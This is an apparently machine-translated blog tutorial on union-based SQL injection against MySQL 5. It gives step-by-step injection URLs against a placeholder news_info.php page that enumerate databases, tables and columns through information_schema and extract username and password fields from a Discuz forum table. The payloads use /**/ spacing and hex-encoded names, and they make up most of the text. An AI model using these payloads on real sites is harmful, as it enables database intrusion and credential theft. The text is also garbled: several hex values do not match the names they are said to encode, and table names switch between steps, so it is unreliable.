Mysql5 advanced injection techniques and injection code Summary

I hope it will be useful to you. For more information, see the article fromKnife guest blog
This article reads the Mysql5 Injection Technique article and explains the code ..


Mysql> use information_schema;

Database changed

Mysql> show tables;

+ --------------------------------------- +

| Tables_in_information_schema |

+ --------------------------------------- +

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+ --------------------------------------- +

If you are interested, you can install mysql5 on your own.ResearchFor the information stored in these tables, I only select the tables that can be used in the injection.

| SCHEMATA-> name of the storage database,

| --> Key field: SCHEMA_NAME, indicating the Database Name

| TABLES-> storage table name

| --> Keyword field: TABLE_SCHEMA indicates the name of the database to which the table belongs;

TABLE_NAME indicates the table name.

| COLUMNS-> storage field name

| --> Keyword field: TABLE_SCHEMA indicates the name of the database to which the table belongs;

TABLE_NAME indicates the name of the table to which the table belongs.

COLUMN_NAME indicates the field name discuz cdb_virtualforums

As you can see, we only need to construct the query statement through the injection point to obtain the relevant fields, and then we can get the desired information.

Statement (1): mysql> select * from information_schema.schemata query all databases from the mysql5 system library

Corresponding injection statement: xx.com/news_info.php? Wid =-1/**/union/**/select/**/1, SCHEMA_NAME, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 from/**/information_schema.SCHEMATA limit 17, 1 /*

Note (you can query all database names by increasing the first parameter of limit)


Statement (2) mysql> select table_name from information_schema.tables where table_schema = 0x646
97363757A queries all the table names in the database discuz from the MySQL 5 system library, where 0x646
97363757A is the hexadecimal format of discuz

Note: You can add limit followed by 1 to increase, and only one message is displayed.

Corresponding injection statement: xx.com/news_info.php? Wid =-1/**/union/**/select/**/1, TABLE_NAME, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA = 0x77656262617365/**/limit/**/11,1


SQL statement (3) mysql> select column_name from information_schema.columns where table_name = 0x636
4625F7669727475616C666F72756D73; query all fields in the cdb_virtualforums table from the mysql5 system library

Note: You can add limit followed by 1 to increase, and only one message is displayed.

Corresponding injection statement: the tg_adminuser hexadecimal code is 0x74675F61646D696E75736572. Search for the field names in the Table in sequence, as shown in figure
Xx.com/news_info.php? Wid =-1/**/union/**/select/**/1, COLUMN_NAME, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME = 0x74675F61646D696E75736572/**/limit/**/1


Statement (4) select name from discuz. cdb_virtualforums query the value of field (name) in the table (cdb_virtualforums) in the discuz database from the mysql5 system library

Note: You can add limit followed by 1 to increase, and only one message is displayed.

Corresponding injection statement: xx.com/news_info.php? Wid =-1/**/union/**/select/**/1, username, 3, 4, password, 6, 7, 8, 9, 10, 11, 12, 13, 14,15/**/from/**/discuz. cdb_virtualforums